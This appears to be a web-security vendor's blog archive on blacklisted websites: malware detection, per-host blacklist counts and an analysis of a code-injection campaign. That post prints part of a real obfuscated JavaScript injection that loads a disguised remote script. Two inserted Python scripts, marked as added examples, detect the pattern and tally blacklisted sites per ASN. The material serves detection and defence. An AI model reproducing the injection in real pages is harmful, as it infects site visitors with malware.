
Posts Tagged ‘blacklisted websites’

Google Acknowledges Challenges in Detecting Web-Malware

August 18th, 2011

Google announced today that the fight to detect web-based malware is far from over. The problem is growing and changing every day. Websites must be protected to prevent the spread of web-based malware.

From the Article

Google issued a new study on Wednesday detailing how it is becoming more difficult to identify malicious websites and attacks, with antivirus software proving to be an ineffective defense against new ones.

Read More: Google highlights trouble in detecting Web-based malware

How do I protect my site?
StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


Zero to 3000+ Infected Sites in Less Than 30 Minutes

March 1st, 2010

Code injection attacks show no signs of abating. Every day, more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers compromise websites without the website owner's knowledge in order to infect the site's visitors.

Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of how rampant this problem is, we show how we found over 3000 infected websites, of which only a small percentage appears to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, identified only a small portion of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching Google for a small part of the above code (shown below), we found a list of websites that harbor it. A mere mention of this code on a website's pages does not necessarily imply that the website is malicious; it could be that a website administrator was asking for clarification on a help forum. Our systems therefore perform a detailed, automated examination to remove any doubt.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found carrying this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like Google’s Safe Browsing List, are not complete.
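As an added example (not code from the original post), the following Python triage script shows one way to detect this injection family on a fetched page: it emulates the `'literal'.replace(/[chars]/g, '')` string-stripping trick the sample uses, checks what the decoded strings resolve to, and also looks for the search signature quoted above. The sample page and the script URL in it are constructed.

```python
import re

# Constructed sample page mimicking the injection family discussed above
# (the one beginning `this.v="";:LineMixer [var i=`); the URL is a placeholder.
SAMPLE_PAGE = """<html><body><p>hello</p><script>
this.v="";:LineMixer [var i=15492;var y=window;
var a='s*c*r:iVpTt:'.replace(/[\\:TVJ\\*]/g, '');
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\\*bjY]/g, '');
uh=document[u](a);uh['s;rpcp'.replace(/[p;t6O]/g, '')]='http://example.invalid/x.js';
</script></body></html>"""

# Matches the JS idiom  'literal'.replace(/[chars]/g, '')  used to hide strings.
OBF_RE = re.compile(r"'([^']*)'\.replace\(/\[([^\]]*)\]/g,\s*''\)")
# Decoded strings that indicate a script element is being built and loaded.
SUSPICIOUS = {"script", "createelement", "src", "appendchild"}
SIGNATURE = 'this.v="";:LineMixer [var i='


def decode_strip_replace(literal, char_class):
    """Emulate 'literal'.replace(/[char_class]/g, ''): delete every character
    named in the class (JS backslash escapes inside the class are dropped)."""
    drop = set(char_class.replace("\\", ""))
    return "".join(ch for ch in literal if ch not in drop)


def decoded_strings(page):
    """Return every string the page reveals through the strip-replace idiom."""
    return [decode_strip_replace(lit, cls) for lit, cls in OBF_RE.findall(page)]


def score_page(page):
    """Flag a page if it carries the known signature, or if at least two of its
    decoded strings resolve to DOM names used to inject a remote script."""
    hits = sorted({s for s in decoded_strings(page) if s.lower() in SUSPICIOUS})
    flagged = SIGNATURE in page or len(hits) >= 2
    return flagged, hits


if __name__ == "__main__":
    print(decoded_strings(SAMPLE_PAGE))   # ['script', 'createElement', 'src']
    print(score_page(SAMPLE_PAGE))        # (True, ['createElement', 'script', 'src'])
```

The decoded-string check catches re-obfuscated variants of the same family where the literal signature has changed but the `createElement` / `script` / `src` pattern is still present.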

Till next time.


Do News Aggregation Websites Point to Blacklisted Sites?

January 19th, 2010

News aggregation sites, like Digg.com, Reddit.com, Ycombinator and Yahoo Buzz play an important part in the lives of many web-surfers. It is reported that sites like Digg.com have garnered more visitors than heavyweights like Facebook [1].

I was recently asked: “What is the probability that a site listed on a popular news aggregation site is blacklisted?” The answer is not a simple one. We understand that benign websites are often compromised by malicious code, sometimes through application-layer vulnerabilities, server-side vulnerabilities, or a combination of both. Good websites can even be compromised by simple password disclosure or, worse, a blatantly nonchalant attitude towards security.

My instinct tells me that any site listed on these well-known news aggregation sites, if infected, will be spotted rather quickly by some visitor to the “infected” website. If the webmaster is even half interested in the reputation of their site, they will take prompt action to remove the offending code as the number of visitors providing feedback continues to grow. Therefore, even if a site listed on a news aggregation site were to be compromised, I think it would be fixed up rather quickly.

In short, I think the probability of finding an “infected” site listed on these news aggregation websites is pretty low. To test this, at StopTheHacker.com we conducted a small experiment. We analyzed around 1162 unique websites which were pointed to by one of the four news aggregation websites below:

We found that none of the 1162 analyzed sites were listed on Google’s Safe Browsing malware hash list as of January 19, 2010. This may indicate that good content, interesting to the masses, is hosted on sites conscious about their security and the safety of their visitors. Given the state of Internet security today, this is one of the few heartening trends.


Large Webhosts: How Serious About Security Are They?

January 19th, 2010

Some of the largest web hosting companies in the United States and abroad each host more than 500,000 websites. These web-hosting companies focus on providing a cost-effective solution for clients to develop and maintain their Internet-facing websites. To protect these websites, the hosting companies often use Web-Application-Filters (WAFs) and more traditional firewall-type devices, along with password-protected (S)FTP access.

Anyone delving into web application security would realize that simply throwing up a bunch of WAFs to deal with code-injection attacks is not the greatest solution. Code injection attacks are constantly evolving because they give hackers an effective medium for delivering malicious code to unsuspecting Internet surfers. It is not for lack of effort on the part of WAF developers that code injection attacks are not being nipped in the bud; rather, this attack vector is so attractive to hackers because it furthers their nefarious intentions with comparatively less effort than other, more involved hacking techniques.

Bottom line: code injection attacks and their signatures are constantly changing, and the WAFs used by many hosting companies cannot guarantee full protection against them.

Two big reasons it is difficult to protect websites:

  1. You can only protect against what you know about
  2. WAFs are not self-learning and self-tuning

At StopTheHacker.com, our approach is to develop systems based on artificial intelligence techniques that learn from attacks and adapt, using machine learning to identify and block previously unknown code-injection incidents.

In this article we try to identify how many sites from each of the top few web-hosting companies are currently blacklisted. This gives us an indication of the kind of security being employed and how effective it is.

This test was conducted on January 19, 2010. The AS (autonomous system) data was mined from CAIDA and correlated with Google Safe Browsing data.
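As an added example (not the page's own tooling), the correlation described above can be reproduced in Python: each blacklisted site's IP is mapped to its origin ASN by longest-prefix match over a prefix-to-AS table like CAIDA's, and hits are then counted per ASN. The prefixes, ASNs, hostnames and blacklist below are constructed sample data.

```python
import ipaddress
from collections import Counter

# Constructed stand-in for a CAIDA prefix-to-AS table (RFC 5737 test ranges,
# private-use ASNs); a real table has hundreds of thousands of rows.
PREFIX_TO_ASN = {
    "203.0.113.0/24": 64500,
    "203.0.113.128/25": 64501,  # more specific than the /24: must win
    "198.51.100.0/24": 64502,
}
# Constructed hostname -> resolved IP pairs and a constructed blacklist.
SITE_IPS = {
    "bad1.example": "203.0.113.10",
    "bad2.example": "203.0.113.200",
    "bad3.example": "198.51.100.5",
    "bad4.example": "203.0.113.77",
    "bad5.example": "192.0.2.9",  # no covering prefix in the table
    "good.example": "203.0.113.20",
}
BLACKLIST = {"bad1.example", "bad2.example", "bad3.example",
             "bad4.example", "bad5.example"}


def build_table(prefix_map):
    """Parse prefixes and order them longest-first so the first match is the
    most specific announcement, as in a routing-table lookup."""
    nets = [(ipaddress.ip_network(p), asn) for p, asn in prefix_map.items()]
    nets.sort(key=lambda t: t[0].prefixlen, reverse=True)
    return nets


def asn_for_ip(ip, table):
    """Longest-prefix match of one address against the table; None if uncovered."""
    addr = ipaddress.ip_address(ip)
    for net, asn in table:
        if addr in net:
            return asn
    return None


def blacklisted_per_asn(site_ips, blacklist, prefix_map):
    """Count blacklisted hostnames per origin ASN; hosts whose address no
    prefix covers are returned separately rather than silently dropped."""
    table = build_table(prefix_map)
    counts, uncovered = Counter(), []
    for host, ip in site_ips.items():
        if host not in blacklist:
            continue
        asn = asn_for_ip(ip, table)
        if asn is None:
            uncovered.append(host)
        else:
            counts[asn] += 1
    return dict(counts), uncovered
```

Raw counts per ASN favour large hosts; divide by the number of sites each ASN hosts if you want a comparable infection rate.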

Number of sites blacklisted by hosting company:

Hosting Company Name           ASN  Sites Blacklisted

IX WebHosting                32392               4160
GoDaddy                      26496              12648
DreamHost                    26347               5636
GigeNet                      32181                647
Peer 1                       11388               2332
Lunar Pages                  15244               3754
iWeb                         32613               2161
ThePlanet/HostGator          21844              11347
Bluehost/Hostmonster         11798               6232
LiquidWeb                    32244               3113
Leaseweb                     16265               2393
Schlund (1&1)                 8560               9105
Tele2 Telecommunication GmbH  8437               8229
China Telecom                 4812               4919
Inetwork/iEurop              29629               3197
NetworkSolutions              6245                739
RackSpace                    33070                698

Clearly, whatever security mechanisms these hosting companies employ are not enough to stop hordes of their websites from falling prey to code-injection attacks and other forms of malicious attack. Perhaps the owners of these large numbers of compromised websites will force web-hosting companies to take a more proactive approach to safe hosting for their clients.

Interestingly, a web-hosting company which focuses on a secure hosting experience maps to ASN 7819, which seems to host 26 malicious sites.

EDIT: On Jan 20 2010, 7:05 AM PST, we received feedback from the web-hosting company that focuses on a secure hosting experience, stating that the IP ranges mentioned (below) in this article are not used by them to host websites, but simply belong to the datacenter they employ. We would be very interested in re-evaluating the IP ranges they use to present websites on the Internet.

